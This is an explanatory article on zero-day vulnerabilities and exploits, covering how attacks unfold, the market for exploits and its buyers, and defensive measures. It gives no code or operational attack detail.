What Are Zero-Day Exploits and How Do They Work?

The Flaw Nobody Knows About

Every piece of software contains bugs. Most are harmless. But occasionally, a flaw grants an attacker the ability to take over a device, steal data, or install surveillance tools — and the software maker has no idea it exists. That flaw is called a zero-day vulnerability, and the code written to exploit it is a zero-day exploit. The name reflects a harsh reality: once an attacker strikes, the vendor has had "zero days" to prepare a fix.

Zero-days sit at the top of the cybersecurity threat hierarchy. They bypass antivirus software, evade firewalls, and render even well-patched systems vulnerable. In 2025, Google's Threat Intelligence Group tracked 90 zero-day vulnerabilities exploited in the wild — up from 78 the year before — with nearly half targeting enterprise systems, an all-time high.

How a Zero-Day Attack Unfolds

A zero-day attack typically follows a sequence security researchers call the cyber kill chain. First, attackers discover an unknown flaw through reverse-engineering, fuzzing (automated input testing), or simply scrutinizing source code. Next, they build a weaponized exploit — often a small piece of code that triggers the vulnerability to gain unauthorized access.

Delivery comes through familiar channels: a phishing email, a compromised website, or a malicious document. Once the exploit fires, the attacker gains a foothold — installing malware, escalating privileges, or opening a backdoor for persistent access. Because no patch exists, traditional signature-based defenses are blind to the attack.

Modern campaigns frequently chain multiple vulnerabilities together. The DarkSword exploit kit, whose code was publicly leaked in March 2026, combined six iOS flaws — three of them zero-days — to achieve full device takeover, extracting contacts, messages, and keychain data from iPhones.

A Multi-Million-Dollar Market

Zero-day exploits are extraordinarily valuable. According to TechCrunch, a fully weaponized iPhone exploit chain can fetch $5 million to $7 million on the open market, while Android exploits command up to $5 million. Prices have multiplied in recent years as companies harden their products, making each working exploit rarer and more prized.

Three distinct buyer groups compete for these tools. Government intelligence agencies — with the Five Eyes nations historically dominating the market — purchase zero-days for surveillance and offensive cyber operations. Commercial spyware vendors like NSO Group stockpile them to power products such as Pegasus, which has been used against journalists, activists, and political figures worldwide. And criminal organizations deploy them in ransomware campaigns and data theft.

Why Defense Is So Difficult

The core challenge is asymmetry: attackers need to find just one flaw, while defenders must protect millions of lines of code. Research from CIQ shows that enterprise patch cycles take 30 to 60 days, yet attackers routinely weaponize disclosed vulnerabilities in under 15 days. In the first half of 2025, VulnCheck found that 32% of exploited vulnerabilities were attacked on or before the day of public disclosure.

Since you cannot patch what you do not know about, organizations increasingly rely on behavioral detection — monitoring what software actually does rather than matching known signatures. Network segmentation, least-privilege access policies, and application sandboxing add further layers of defense. Apple's Lockdown Mode, for example, drastically reduces the iPhone's attack surface by disabling features attackers commonly exploit.

The Arms Race Continues

Zero-day exploits will remain cybersecurity's most potent weapon for the foreseeable future. As software grows more complex and the value of data increases, the incentive to discover — and sell — unknown flaws only grows. For ordinary users, the best defense is straightforward: keep devices updated, enable automatic patching, and treat unexpected links and attachments with suspicion. In the zero-day world, the clock starts at zero — and every hour without a fix counts.